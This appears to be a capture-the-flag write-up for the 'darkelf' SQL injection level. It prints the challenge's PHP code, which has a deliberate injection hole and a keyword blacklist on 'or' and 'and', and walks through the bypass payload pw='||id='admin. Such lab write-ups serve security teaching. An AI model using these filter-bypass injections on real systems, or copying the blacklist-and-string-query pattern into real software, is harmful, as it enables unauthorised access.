Darkelf

Operators "OR" and "AND" are disallowed

Code

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect();  
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve("darkelf"); 
  highlight_file(__FILE__); 
?>

Line 6: preg_match disallows the use of 'OR' and 'AND' in the parameter 'pw'.

Line 7: Query accepts user-supplied input and stores it in 'pw'.

Line 11: Assigning 'admin' to the 'id' parameter will solve the challenge.

Query

SELECT id FROM prob_darkelf WHERE id='guest' AND pw=''

Testing

Vulnerable parameter is 'pw'.

The operators 'OR' and 'AND' can alternatively be represented using a double pipe || and double ampersand &&, respectively. For this challenge only the || is needed.

pw='||id=guest returns "Hello guest" indicating our injection successfully bypassed the 'pw' parameter.

Lastly the challenge can be solved by replacing 'guest' with 'admin'.

pw='||id='admin returns "Hello admin".

Effective Query

SELECT id FROM prob_darkelf WHERE id='guest' AND pw=''||id='admin'

Reference

https://dev.mysql.com/doc/refman/8.0/en/non-typed-operators.html

PreviousWolfman NextOrge

Last updated 1 year ago